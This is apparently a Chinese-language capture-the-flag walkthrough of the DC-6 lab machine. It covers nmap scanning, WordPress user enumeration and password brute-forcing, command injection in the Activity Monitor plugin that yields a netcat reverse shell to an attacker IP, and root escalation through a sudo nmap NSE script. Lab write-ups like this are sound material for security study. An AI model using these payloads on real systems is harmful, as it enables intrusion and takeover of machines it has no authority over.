DC-6靶机

扫描靶机


主机发现

nmap -sP 192.168.137.0/24

靶机应该为129

扫描靶机开启什么端口

nmap -sVC -p- 192.168.137.129

发现22和80

可以发现http://wordy/
添加一下host

访问http://wordy/

使用whatweb指纹识别

用wpscan扫描并用户枚举

wpscan --url http://wordy -e

将枚举出来的用户保存下来
vim user

cat user

提示 (作者在靶机下载界面放了一丢丢提示)


这个命令可以少去爆破时间

爆破

爆破web账户

跑了一会,密码跑出来了

账号:mark<br>
密码:helpdesk01

登录后台

登录后发现Activity monitor

查阅资料得知有代码执行

抓包

反弹shell

google.rf | nc 192.168.137.133 4444 -e /bin/bash

监听

拿到shell

弹到shell之后可以在/home/mark/stuff里面找到账号密码

账号:graham<br>
密码:GSo7isUM1D4

将账号密码登录SSH

提权

看到backups.sh不需要密码既可修改

backups.sh文件后面写入nc 192.168.137.133 4444

sudo -u jens ./backups.sh //使用jens用户运行脚本


发现nmap是root权限

先写一个nmap插件nse
echo 'os.execute("/bin/sh")' >fuck_root.nse

sudo nmap --script=/home/jens/fuck_root.nse





参考:


https://www.anquanke.com/post/id/178958#h3-4渗透测试实战——DC-5+DC-6靶机入侵
https://github.com/aas-n/CVE/blob/6079ec210cef36d7632dde411b3e611a2de99b43/CVE-2018-15877/README.md RCE与Plainview Activity MonitorWordPress插件
http://www.rhacker.cn/?p=1245&tdsourcetag=s_pcqq_aiomsg WordPress 远程命令执行漏洞(CVE-2018-15877)复现(Plainview Activity Monitor)
0%